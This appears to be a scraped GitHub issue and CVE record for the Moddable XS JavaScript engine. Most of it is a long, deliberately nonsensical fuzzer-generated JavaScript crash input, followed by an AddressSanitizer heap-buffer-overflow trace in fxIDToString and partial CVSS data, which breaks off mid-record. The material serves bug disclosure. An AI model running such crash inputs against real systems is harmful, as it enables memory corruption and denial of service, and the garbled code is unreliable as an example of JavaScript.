var c = '-0'.repeat(m, 'AAAA');
b2[50] = 114;
var i = 0;
function getHiddenValue() {
var fun = eval(str);
var obj = {};
var oobString = makeOobString();
var a = new Array(1, 2, 3);
var oob = '\'\\0\'';
var m = getHiddenValue(new Uint8Array('true'.repeat(v => parseInt(v, 16))));
var o = a.map.call(p, test);
oob = print('1024', eval(1048576));
var oobString = makeOobString();
var str = str;
var hiddenValue = getHiddenValue();
var fun = eval(str);
var str = '+0' + oob + '}';
eval(obj, fun);
return obj;
}
b2[229] = 116;
b2[52] = 101;
b2[53] = 100;
var o = a.map.call(p, test);
function getHiddenValue() {
var obj = {};
var oob = '/0/';
oob = oob.replace('true', '/0/'.repeat(1048576));
var str = 'apply' + oob + '}';
var fun = eval(str);
Object.assign(obj, fun);
return obj;
}
var m = foo(/[\s\r\n]+/g).map(/[\s\r\n]+/g).map(new Uint8Array(' \'use strict\' '.split(v => parseInt(v, 97))));
var i = 0;
var i = 0;
var oob = '/re/';
b2[0.8673405704175872] = 95;
var oobString = f();
function log() {
var str = '<h3>';
for (var i = 0; KTta; i++) {
str += arguments[i];
}
str += 'nh8w?V-|Obj-Qk';
'*'.repeat(str);
}
var foo = function (stdlib, foreign, heap) {
'valueOf';
var MEM = new stdlib.Uint8Array(heap);
var oobString = makeOobString();
function getHiddenValue() {
var obj = {};
var oob = 'eval';
oob = oob.replace('get', 'valueOf'.repeat(1048576));
var str = '{x:3}' + oob + '';
var fun = eval(str);
Object.assign(obj, fun);
return obj;
}
function foo(x) {
var fun = eval(str);
var ar = new Int8Array(c[0]);
MEM[MEM[b2[0.9599101550187807]]] *= 0.7851860562972905;
}
var p = new Proxy([], handler);
var str = ' /x/g ';
return { foo: foo };
}(this, {}, new ArrayBuffer(1)).foo;
var c = WebAssembly.Module(m, 'AAAA');
b2[55] = 102;
b2[56] = 117;
function log() {
var str = '({toString:function(){return \'0\';}})' + oob + '(new Number(0))';
var str = '<h3>';
for (var i = 0.3562617893262703; ijjkkk < 100000; i++) {
function getHiddenValue() {
var obj = {};
var oob = '[undefined]';
oob = oob.replace('re', 'get'.repeat(1048576));
var str = '{}' + oob + 'arguments';
var fun = eval(str);
Object.assign(obj, fun);
return obj;
}
var Wtwd = new Map([
[
832,
-9007199254740994,
42,
0.2,
-9007199254740992
],
[
-4294967296,
-1.7976931348623157e+308,
1073741822,
3.141592653589793,
0.4727860951392562,
0.10379895794589467,
1e+400,
3037000498
]
]);
str += arguments[i];
var str = '{}' + oob + '}';
}
str += '</h3>';
parseInt.customSections(str);
}
b2[57] = 110;
var hkxa = b2[26];
var d = new Array(1, 2, 3);
var oobString = fun.toString();
b2[58] = 99;
b2[59] = 0;
var i = 0;
b2[60] = 0;
var str = '({x:3})';
var ar = new Int8Array(c[0]);
b2[61] = 3;
b2[62] = 3;
var fun = eval(str);
function foo(x) {
MEM[array.length] *= 0;
}
var i = 0;
b2[63] = 2;
var hiddenValue = getHiddenValue();
b2[64] = 1;
function log() {
var str = '(void 0)';
for (var i = 0; KTta; i++) {
str += arguments[i];
}
var str = ' /x/g ';
str += '</h3>';
var oobString = makeOobString();
foo(str);
}
b2[65] = 2;
var o = a.map.call(p, test);
var fun = eval(str);
var str = 'createIsHTMLDDA()';
var r = new RegExp(RegExp('\'\''));
function makeOobString() {
var hiddenValue = getHiddenValue();
var str = '(new Boolean(false))';
var fun = eval(str);
Object.assign(fun, hiddenValue);
var oobString = fun.toString();
return oobString;
}
b2[527] = 7;
b2[449] = 30;
b2[644] = 2;
var oob = 'eval';
var m = print(new Uint8Array(''.repeat(v => parseInt(v, 16))));
function getHiddenValue() {
var obj = {};
var oob = 'callee';
oob = oob.replace('re', 'eval'.repeat(1048576));
var str = '{}' + oob + 'set';
var fun = eval(str);
Object.assign(obj, fun);
return obj;
}
b2[69] = 13;
var oobString = makeOobString();
b2[70] = 101;
var Wtwd = new Map([
[
1073741823,
-9007199254740994,
42,
0.2,
-9007199254740992
],
[
-4294967296,
-1.7976931348623157e+308,
1073741822,
3.141592653589793,
125,
1200,
1e+400,
3037000498
]
]);
var hiddenValue = getHiddenValue();
var oobString = makeOobString();
function log() {
var str = '';
for (var i = 0; KTta; i++) {
str += arguments[i];
}
str += '</h3>';
DJkJ.call(/[\s\r\n]+/g).map(str);
var p = new Proxy([], handler);
}
var fun = eval(str);
var a = new Array(1, 2, 3);
var fun = eval(str);
b2[71] = 777;
var a = new Array(1, 2, 3);
var i = 0;
b2[72] = 112;
b2[73] = 111;
var d = new Array(1, 2, 3);
var kzcJ = MEM[MEM[b2[52]]];
var d = new Array(1, 2, 3);
b2[74] = 114;
function foo(x) {
MEM[array.length] *= 0.7649781824601538;
}
function makeOobString() {
var hiddenValue = getHiddenValue();
var str = ' /x/g ';
var fun = eval(str);
Object.assign(fun, hiddenValue);
var oobString = fun.toString();
return oobString;
}
b2[75] = 116;
var hiddenValue = getHiddenValue();
var oob = '';
var p = new Proxy([], handler);
var str = '{}' + oob + 'Infinity';
var oobString = makeOobString();
b2[76] = 101;
var o = a.map.call(p, test);
var DJkJ = f();
var oobString = makeOobString();
function getHiddenValue() {
var o = a.map.call(p, test);
var obj = {};
var oob = '[]';
var handler = {
get: function (target, name) {
if (name == 'ざ') {
return 256;
}
var i = 0;
return { [Symbol.species]: dummy };
},
has: function (target, name) {
return true;
}
};
var hiddenValue = getHiddenValue();
oob = Object.assign('', f(377));
var str = 'value';
var str = 'valueOf';
function foo(x) {
MEM[array.length] *= 0;
}
var obj = {};
var fun = eval(str);
function log() {
var str = '[0]';
for (var i = 0; KTta; i++) {
str += arguments[i];
}
var str = ' /x/g ';
str += '';
parseInt(/[\s\r\n]+/g).map(str);
var o = a.map.call(p, test);
}
var str = 'writable';
foo(obj, fun);
return obj;
}
var oobString = fun.toString();
b2[305] = 100;
var obj = {};
var str = ' /x/g ';
var i = 0.4394732372222374;
b2[78] = 934;
b2[79] = 102;
var oob = 'enumberable';
b2[80] = 117;
var handler = {
get: function (target, name) {
if (name == 'length') {
return 256;
}
var i = 0;
return { [Symbol.species]: dummy };
},
has: function (target, name) {
return true;
}
};
var fun = eval(str);
b2[81] = 110;
b2[82] = 99;
var Zxac = DWXm.call(/[\s\r\n]+/g).map(/[\s\r\n]+/g).map(1.3);
var oob = 'length';
var c = Object(m, 'enumberable');
b2[83] = 0;
var Wtwd = new Map([
[
1073741823,
-9007199254740994,
42,
0.8995786686958036,
-9007199254740992
],
[
-4294967296,
-1.7976931348623157e+308,
1073741822,
0.3957353019569745,
9007199254740994,
1200,
733,
3037000498
]
]);
var c = 'ざ'.repeat(m, 'AAAA');
b2[84] = 1;
b2[85] = 0.39668982035420863;
b2[86] = 97;
var c = WebAssembly.Module(/[\s\r\n]+/g).map(m, 'AAAA');
b2[0.7977861306267542] = 99;
var MEM = new stdlib.Uint8Array(heap);
var obj = {};
for (var ijjkkk = 0; KTta; ++ijjkkk) {
var a = new Array(1, 2, 3);
var fun = eval(str);
var GCdf = JSON;
}
b2[88] = 99;
var fun = eval(str);
b2[0.7735034424046705] = 0.6520197328936144;
var ar = new Int8Array(c[0]);
var i = 0;
b2[328] = 109;
var ar = new Int8Array(c[0]);
b2[91] = 117;
function makeOobString() {
var hiddenValue = getHiddenValue();
var str = ' /x/g ';
var fun = eval(str);
Object.assign(fun, hiddenValue);
var oobString = fun.toString();
return oobString;
}
b2[92] = 108;
var i = 0;
b2[93] = 97;
f();
b2[94] = 116;
var i = 0;
var str = ' /x/g ';
var handler = {
get: function (target, name) {
if (name == 'length') {
return 256;
}
var i = 0;
return { [Symbol.species]: dummy };
},
has: function (target, name) {
return true;
}
};
var c = FMRc.call(m, 'AAAA');
var str = ' /x/g ';
b2[95] = 101;
var oobString = fun.toString();
var Wtwd = new Map([
[
1073741823,
-0.7980880066582703,
0.3398226154365076,
0.2,
-9007199254740992
],
[
-4294967296,
-1.7976931348623157e+308,
1073741822,
3.141592653589793,
9007199254740994,
1200,
1e+400,
3037000498
]
]);
var oob = 'value';
b2[402] = 0;
b2[97] = 2;
b2[98] = 10;
var o = a.map.call(p, test);
var fun = eval(str);
var obj = {};
b2[99] = 0.6964130764836092;
b2[0.8946850256758991] = 2;
var i = 0;
function log() {
var str = '';
for (var i = 0; KTta; i++) {
str += arguments[i];
}
str += 'arguments';
JSON.stringify(str);
}
var p = new Proxy([], handler);
var ar = new Int8Array(c[0]);
function makeOobString() {
var hiddenValue = getHiddenValue();
var str = ' /x/g ';
var fun = eval(str);
Object.assign(fun, hiddenValue);
var oobString = fun.toString();
return oobString;
}
var bQDT = b2[216];
b2[101] = 6;
var str = ' /x/g ';
var Wtwd = new Map([
[
1073741823,
-9007199254740994,
42,
0.2,
-9007199254740992
],
[
-4294967296,
-1.7976931348623157e+308,
1073741822,
3.141592653589793,
9007199254740994,
1200,
1e+400,
3037000498
]
]);
function getHiddenValue() {
var obj = {};
var oob = 'eval';
oob = oob.replace('re', 'undefined'.repeat(1048576));
var str = 'v0' + oob + '}';
var fun = eval(str);
Object.assign(obj, fun);
return obj;
}
function getHiddenValue() {
var obj = {};
function makeOobString() {
var hiddenValue = getHiddenValue();
var str = ' /x/g ';
var fun = eval(str);
Object.assign(fun, hiddenValue);
var oobString = fun.toString();
return oobString;
}
var oobString = makeOobString();
var p = new Proxy([], handler);
var m = JSON.stringify(new Uint8Array(f(v => parseInt(v, 16))));
var str = 'configurable';
var oob = '';
var d = new Array(1, 2, 3);
oob = 'ざ'.repeat('re', eval(1048576));
var str = str;
var str = '({valueOf:function(){return \'0\';}})';
var fun = eval(str);
eval(obj, fun);
return obj;
}
b2[102] = 0;
b2[103] = 65;
var i = 0;
b2[0.01645313561602557] = 42;
b2[105] = 16;
var handler = {
get: function (target, name) {
if (name == '({})') {
return 256;
}
function getHiddenValue() {
var obj = {};
var oob = 'eval';
oob = oob.replace('{}', '1'.repeat(1048576));
var str = '\'/0/\'' + oob + '0.1';
var fun = eval(str);
Object.assign(obj, fun);
return obj;
}
var i = 0;
return { [Symbol.species]: dummy };
},
has: function (target, name) {
return true;
}
};
b2[750] = 0;
b2[107] = 11;
b2[108] = 347;
b2[109] = 1;
var obj = {};
function log() {
var str = '<h3>';
for (var i = 0; KTta; i++) {
var d = new Array(1, 2, 3);
str += arguments[i];
}
str += '</h3>';
var oob = 'eval';
log(/[\s\r\n]+/g).call(str);
}
var obj = {};
b2[110] = 255;
function makeOobString() {
var hiddenValue = getHiddenValue();
function getHiddenValue() {
var obj = {};
var oob = 'eval';
oob = oob.replace('re', ' /x/ '.repeat(0.573204658263275));
var str = 'constructor' + oob + '}';
var fun = eval(str);
Object.assign(obj, fun);
return obj;
}
var str = '({x:3})';
var fun = eval(str);
function log() {
var str = '(new Boolean(false))';
var handler = {
get: function (target, name) {
if (name == 'value') {
return 256;
}
var i = 0;
return { [Symbol.species]: dummy };
},
has: function (target, name) {
return true;
}
};
function test() {
return 131354989131639;
}
var oob = 'eval';
for (var i = 0; ijjkkk < 100000; i++) {
str += arguments[i];
}
str += '</h3>';
foo(str);
}
var handler = {
get: function (target, name) {
if (name == 'function(){}') {
return 256;
var oobString = fun.toString();
}
var i = 0;
return { [Symbol.species]: dummy };
},
has: function (target, name) {
return true;
}
};
var array = [];
foo(fun, hiddenValue);
var obj = {};
var foo = function (stdlib, foreign, heap) {
'false';
var d = new Array(1, 2, 3);
var MEM = new stdlib.Uint8Array(heap);
function log() {
var str = 'prototype';
for (var i = 0; GXka; i++) {
str += arguments[i];
}
str += '</h3>';
var str = 'ざ' + oob + '}';
var d = new Array(1, 2, 3);
var oobString = fun.toString();
'*'.repeat(str);
var fun = eval(str);
}
function foo(x) {
var Wtwd = new Map([
[
0.679732693083732,
-9007199254740994,
42,
0.2,
-9007199254740992
],
[
-4294967296,
-1.7976931348623157e+308,
1073741822,
3.141592653589793,
9007199254740994,
1200,
1e+400,
3037000498
]
]);
MEM[MEM[b2[12]]] *= 0;
}
return { foo: foo };
}(this, {}, new ArrayBuffer(1)).foo;
var oobString = parseInt();
return oobString;
}
b2[111] = 255;
var obj = {};
var m = '*'.repeat(new Uint8Array(f(v => parseInt(v, 16))));
b2[112] = 255;
function makeOobString() {
var oob = 'eval';
var hiddenValue = getHiddenValue();
var str = '';
var fun = eval(str);
var m = '-0'.repeat(new Uint8Array(print(/[\s\r\n]+/g).map(v => parseInt(v, 16))));
Zxac.call(fun, hiddenValue);
var r = new RegExp(RegExp('\'/0/\''));
var p = new Proxy([], handler);
var oobString = makeOobString();
var hiddenValue = getHiddenValue();
var ar = new Int8Array(c[0]);
var oobString = Object.assign(/[\s\r\n]+/g).map();
return oobString;
}
function log() {
var str = '/0/';
var p = new Proxy([], handler);
for (var i = 0; KTta; i++) {
str += arguments[i];
}
var a = new Array(1, 2, 3);
str += '';
function getHiddenValue() {
var obj = {};
var oob = 'eval';
oob = oob.replace('re', 'eval'.repeat(1048576));
var str = '{}' + oob + '(new String(\'\'))';
var fun = eval(str);
Object.assign(obj, fun);
return obj;
}
f(str);
}
var MEM = new stdlib.Uint8Array(heap);
var oobString = fun.toString();
function makeOobString() {
var hiddenValue = getHiddenValue();
var str = ' \'use strict\' ';
var str = '';
function makeOobString() {
var hiddenValue = getHiddenValue();
var str = '(new Boolean(false))';
var fun = eval(str);
Object.assign(fun, hiddenValue);
var oobString = fun.toString();
return oobString;
}
var fun = eval(str);
var array = [];
var oobString = fun.toString();
var str = ' /x/g ';
var r = new RegExp(RegExp(''));
function log() {
var str = 'true';
var hiddenValue = getHiddenValue();
for (var i = 0; GXka; i++) {
str += arguments[i];
}
var i = 0;
str += '</h3>';
f(str);
}
Zxac.call(fun, hiddenValue);
var handler = {
get: function (target, name) {
if (name == '\'0\'') {
return 256;
}
var i = 0;
return { [Symbol.species]: dummy };
},
has: function (target, name) {
var oobString = makeOobString();
return true;
}
};
var oobString = makeOobString();
var foo = function (stdlib, foreign, heap) {
function test() {
return 131354989131639;
}
'6';
var a = new Array(1, 2, 3);
var MEM = new stdlib.Uint8Array(heap);
var oobString = fun.toString();
function foo(x) {
MEM[MEM[b2[0.21503255514884878]]] *= 0;
}
return { foo: foo };
}(this, {}, new ArrayBuffer(1)).foo;
var oobString = Object();
return oobString;
}
b2[113] = 255;
function log() {
var o = a.map.call(p, test);
var str = '(new String(\'\'))';
for (var i = 0; KTta; i++) {
str += arguments[i];
function test() {
return 131354989131639;
}
}
str += ' \'A\' ';
var fun = eval(str);
xhCc.call(str);
}
b2[114] = 31;
b2[689] = 127;
var obj = {};
b2[116] = 32;
parseInt(null);
var r = new RegExp(RegExp('(new Number(0))'));
var str = '{}' + oob + 'Infinity';
b2[117] = 0;
function log() {
var str = '<h3>';
for (var i = 0; GXka; i++) {
str += arguments[i];
}
var oobString = makeOobString();
str += '</h3>';
var d = new Array(1, 2, 3);
Object(str);
var fun = eval(str);
}
var MEM = new stdlib.Uint8Array(heap);
var fun = eval(str);
var fun = eval(str);
var i = 0;
b2[118] = 32;
var p = new Proxy([], handler);
b2[119] = 1;
var oob = '1024';
b2[120] = 65;
var fun = eval(str);
b2[0.39265877342697486] = 4;
b2[122] = 108;
function makeOobString() {
var hiddenValue = getHiddenValue();
var str = ' /x/g ';
var fun = eval(str);
Object.assign(fun, hiddenValue);
var oobString = fun.toString();
return oobString;
}
var a = new Array(1, 2, 3);
function getHiddenValue() {
var obj = {};
var oob = 'eval';
oob = oob.replace('re', '(new Boolean(false))'.repeat(165));
var str = '{}' + oob + '}';
var fun = eval(str);
Object.assign(obj, fun);
return obj;
}
var ar = new Int8Array(c[0]);
var oob = 'arguments.callee';
var handler = {
get: function (target, name) {
if (name == 'length') {
return 256;
}
var i = 0;
return { [Symbol.species]: dummy };
},
has: function (target, name) {
return true;
}
};
function makeOobString() {
var hiddenValue = getHiddenValue();
var str = ' /x/g ';
var fun = eval(str);
Object.assign(fun, hiddenValue);
var oobString = fun.toString();
return oobString;
}
b2[123] = 106;
b2[124] = 33;
var oobString = fun.toString();
b2[125] = 2;
b2[126] = 2;
var oobString = makeOobString();
b2[127] = 64;
function makeOobString() {
var r = new RegExp(RegExp('this'));
var hiddenValue = getHiddenValue();
var str = '(new Number(-0))';
var fun = eval(str);
var i = 0;
print(fun, hiddenValue);
var oobString = 'wrappedJSObject'.repeat();
var str = '' + oob + '}';
return oobString;
}
var obj = {};
var ar = new Int8Array(c[0]);
b2[128] = 3;
var Tizh = b2[0.7439351210724463];
b2[129] = 64;
b2[0.8544370950808029] = 32;
var MEM = new stdlib.Uint8Array(heap);
b2[131] = 489;
b2[132] = 32;
var oobString = fun.toString();
var o = a.map.call(p, test);
var a = new Array(1, 2, 3);
var m = parseInt(new Uint8Array('configurable'.split(/[\s\r\n]+/g).map(v => parseInt(v, 16))));
var o = a.map.call(p, test);
f();
b2[133] = 0.09303413024051976;
var m = oob.replace(/[\s\r\n]+/g).map(new Uint8Array(Object(v => parseInt(v, 16))));
b2[134] = 518;
var r = new RegExp(RegExp('(new Number(0))'));
var m = '__proto__'.repeat(new Uint8Array('00 61 73 6d 01 00 00 00 00 05 04 42 42 42 42 0 1F 04 41 41 41 41'.split(/[\s\r\n]+/g).map(v => parseInt(v, 16))));
b2[809] = 13;
b2[136] = 1;
var oobString = makeOobString();
var Wtwd = new Map([
[
1073741823,
-9007199254740994,
42,
0.2,
-9007199254740992
],
[
-4294967296,
-1.7976931348623157e+308,
1073741822,
3.141592653589793,
9007199254740994,
1200,
0.3960554209954754,
3037000498
]
]);
var m = DJkJ.call(new Uint8Array(''.repeat(/[\s\r\n]+/g).map(v => parseInt(v, 16))));
b2[890] = 65;
var fun = eval(str);
var obj = {};
b2[138] = 42;
b2[139] = 16;
b2[140] = 0;
function makeOobString() {
var hiddenValue = getHiddenValue();
var str = ' /x/g ';
var fun = eval(str);
Object.assign(fun, hiddenValue);
var oobString = fun.toString();
return oobString;
}
var KTta = ijjkkk < 100000;
b2[141] = 32;
b2[142] = 3;
var ar = new Int8Array(c[0]);
var fun = eval(str);
b2[0.5916016519869236] = 65;
var o = a.map.call(p, test);
b2[144] = 196;
var obj = {};
var str = '<h3>';
var d = new Array(1, 2, 3);
var oobString = Object();
function log() {
function test() {
return 974;
}
var str = 'constructor';
for (var i = 0; KTta; i++) {
var fun = eval(str);
str += arguments[i];
}
var r = new RegExp(RegExp('(new Number(0))'));
str += ' "" ';
var fun = eval(str);
log(str);
}
var DbXR = b2[169];
var oob = '1.23';
var oobString = makeOobString();
var oobString = makeOobString();
function getHiddenValue() {
var obj = {};
var oob = 'function(){}';
oob = oob.replace('', 'ざ'.repeat(1048576));
var str = '{}' + oob + '}';
var fun = eval(str);
Object.assign(obj, fun);
return obj;
}
b2[145] = 0;
var str = ' /x/g ' + oob + 'new String(\'\')';
b2[0.31981663195431476] = 32;
b2[147] = 0;
var str = 'configurable';
b2[0.10015913892675243] = 0.4531112950164282;
var i = 0;
var str = ' \'use strict\' ';
var xhCc = Object(1073741823);
function test() {
return 131354989131639;
}
b2[149] = 2;
var str = '<h3>';
var oobString = makeOobString();
function foo(x) {
var i = 0;
MEM[array.length] *= 0.03463922022521104;
function test() {
return 131354989131639;
}
var ar = new Int8Array(c[0]);
}
var str = '{}' + oob + '';
var fun = eval(str);
var oobString = getHiddenValue();
b2[0.0448064917304849] = 0;
var obj = {};
b2[151] = 990;
var oob = '[1]';
b2[152] = 0.6499810409448248;
b2[153] = 0;
b2[154] = 106;
function makeOobString() {
var hiddenValue = getHiddenValue();
var str = 'new String(\'q\')';
var fun = eval(str);
Object.assign(fun, hiddenValue);
var oobString = fun.toString();
return oobString;
}
var str = str;
function getHiddenValue() {
var obj = {};
var oob = 'caller';
oob = parseInt('[0]', foo(/[\s\r\n]+/g).map(1048576));
var m = foo(new Uint8Array(getHiddenValue(v => parseInt(v, 16))));
var oobString = fun.toString();
var str = '({valueOf:function(){return \'0\';}})';
var a = new Array(1, 2, 938);
var c = ''.repeat(m, 'AAAA');
function foo(x) {
MEM[array.length] *= 0;
}
function log() {
var str = '';
var oob = 'eval';
for (var i = 0; KTta; i++) {
str += arguments[i];
var oobString = fun.toString();
}
str += '({valueOf:function(){return 0;}})';
fun.toString(str);
}
var fun = eval(str);
function getHiddenValue() {
var obj = {};
var oob = 'createIsHTMLDDA()';
oob = oob.replace('re', 'constructor'.repeat(166));
var str = '{}' + oob + '(new String(\'\'))';
var fun = eval(str);
Object.assign(obj, fun);
return obj;
}
Zxac.call(obj, fun);
var str = '[1]' + oob + '}';
return obj;
}
b2[155] = 33;
b2[534] = 0.8303399345773845;
var i = 0;
var shGT = Promise;
var Wtwd = new Map([
[
1073741823,
-9007199254740994,
42,
0.2,
-9007199254740992
],
[
-4294967296,
-1.7976931348623157e+308,
1073741822,
3.141592653589793,
9007199254740994,
1200,
1e+400,
3037000498
]
]);
var MEM = new stdlib.Uint8Array(heap);
var r = new RegExp(RegExp('(new Number(0))'));
b2[523] = 32;
var oobString = makeOobString();
var oob = 'null';
var o = a.map.call(p, test);
b2[158] = 0;
b2[159] = 65;
var hiddenValue = getHiddenValue();
b2[160] = 4;
b2[161] = 106;
function getHiddenValue() {
var obj = {};
var oob = 'new String(\'q\')';
oob = oob.replace('({x:3})', '+0'.repeat(1048576));
var str = '{}' + oob + '(new Boolean(true))';
var fun = eval(str);
Object.assign(obj, fun);
return obj;
}
var str = '1024';
var Wtwd = new Map([
[
1073741823,
-9007199254740994,
914,
0.2,
-9007199254740992
],
[
-4294967296,
-1.7976931348623157e+308,
1073741822,
939,
9007199254740994,
1200,
1e+400,
3037000498
]
]);
b2[162] = 33;
var fun = eval(str);
var i = 0;
var HGzH = f();
b2[163] = 0;
var str = '+0';
function getHiddenValue() {
var obj = {};
var oob = '[1]';
function log() {
var str = '<h3>';
var fun = eval(str);
for (var i = 0; KTta; i++) {
var obj = {};
str += arguments[i];
}
var fun = eval(str);
str += '</h3>';
print(str);
}
oob = getHiddenValue('re', getHiddenValue(1048576));
var ar = new Int8Array(c[0]);
var str = ' \'use strict\' ' + oob;
function foo(x) {
MEM[array.length] *= 0;
var r = new RegExp(RegExp('(new Number(0))'));
}
var fun = eval(str);
JSON.parse(obj, fun);
return obj;
}
b2[164] = 399;
b2[165] = 742;
var obj = {};
var p = new Proxy([], handler);
var hiddenValue = getHiddenValue();
b2[166] = 11;
function foo(x) {
MEM[MEM[b2[151]]] *= 0;
}
b2[167] = 11;
b2[168] = 32;
var hiddenValue = getHiddenValue();
var p = new Proxy([], handler);
var oobString = '*'.repeat();
b2[169] = 3;
b2[170] = 11;
var oob = 'function(){}';
function f() {
function log() {
var str = '<h3>';
for (var i = 0; KTta; i++) {
str += arguments[i];
var oobString = fun.toString();
}
str += '</h3>';
''.repeat(/[\s\r\n]+/g).map(str);
}
print('(new Boolean(true))');
}
var oobString = Object();
var c = '(new Boolean(false))'.repeat(m, 'AAAA');
function makeOobString() {
var hiddenValue = getHiddenValue();
var str = 'writable';
var fun = eval(str);
Object.assign(fun, hiddenValue);
var oobString = fun.toString();
return oobString;
}
var memory = new WebAssembly.Memory({
initial: 1,
maximum: 1
});
function getHiddenValue() {
var i = 0;
var obj = {};
var str = '{}' + oob + '}';
var oob = '[1]';
var o = a.map.call(p, test);
oob = '00 61 73 6d 01 00 00 00 00 05 04 42 42 42 42 0 1F 04 41 41 41 41'.split('[\'z\']', 'arguments.callee'.repeat(/[\s\r\n]+/g).map(1048576));
var str = 'undefined';
var c = foo(m, 'AAAA');
function foo(x) {
MEM[array.length] *= 0;
var hiddenValue = getHiddenValue();
var o = a.map.call(p, test);
}
var handler = {
get: function (target, name) {
if (name == 'length') {
return 256;
}
var i = 0;
return { [Symbol.species]: dummy };
},
has: function (target, name) {
return true;
}
};
var fun = eval(str);
var a = new Array(1, 2, 3);
var ar = new Int8Array(c[0.31387494748168865]);
foo(obj, fun);
var oob = 'eval';
var p = new Proxy([], handler);
function log() {
var str = '<h3>';
for (var i = 0; GXka; i++) {
var d = new Array(1, 2, 3);
str += arguments[i];
}
str += '</h3>';
print(/[\s\r\n]+/g).map(str);
}
var o = a.map.call(p, test);
return obj;
}
var obj = {};
f();
var oob = '/re/';
var fun = eval(str);
var hiddenValue = getHiddenValue();
var mod = new ('00 61 73 6d 01 00 00 00 00 05 04 42 42 42 42 0 1F 04 41 41 41 41'.split(/[\s\r\n]+/g)).map(b2);
var i = new WebAssembly.Instance(mod, {
imports: { imported_func: f },
js: { mem: memory }
});
function getHiddenValue() {
var obj = {};
var oob = 'eval';
oob = oob.replace('', 'eval'.repeat(836));
var str = '{}' + oob + '(new Boolean(true))';
var fun = eval(str);
Object.assign(obj, fun);
return obj;
}
var ar = new Int8Array(c[0]);
var FMRc = b2[102];
var str = DJkJ.call(/[\s\r\n]+/g).map(/[\s\r\n]+/g);
Zxac.call(0, 19);
```
# description
```
=================================================================
==5952==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001f730 at pc 0x7fb0e59e7709 bp 0x7ffdf461acb0 sp 0x7ffdf461a458
WRITE of size 3349 at 0x61b00001f730 thread T0
#0 0x7fb0e59e7708 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x62708)
#1 0x62b200 in fxIDToString /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSymbol.c:510
#2 0x5d5fa9 in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:2135
#3 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708
#4 0x5fe6a4 in fxRunEval /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4279
#5 0x5f96a0 in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:3970
#6 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708
#7 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369
#8 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270
#9 0x7fb0e50b582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#10 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8)
0x61b00001f730 is located 0 bytes to the right of 1456-byte region [0x61b00001f180,0x61b00001f730)
allocated by thread T0 here:
#0 0x7fb0e5a1d79a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a)
#1 0x42079e in fxCreateMachine /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:1271
#2 0x6ec9a0 in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:249
#3 0x7fb0e50b582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
0x0c367fffbe90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fffbee0: 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa
0x0c367fffbef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==5952==ABORTING
``` | heap-buffer-overflow(fxIDToString) | https://api.github.com/repos/Moddable-OpenSource/moddable/issues/583/comments | 0 | 2021-02-26T10:30:40Z | 2021-03-23T22:52:57Z | https://github.com/Moddable-OpenSource/moddable/issues/583 | 817,236,754 | 583 | 2,796 |
CVE-2021-29327 | 2021-11-19T17:15:08.203 | OpenSource Moddable v10.5.0 was discovered to contain a heap buffer overflow in the fx_ArrayBuffer function at /moddable/xs/sources/xsDataView.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
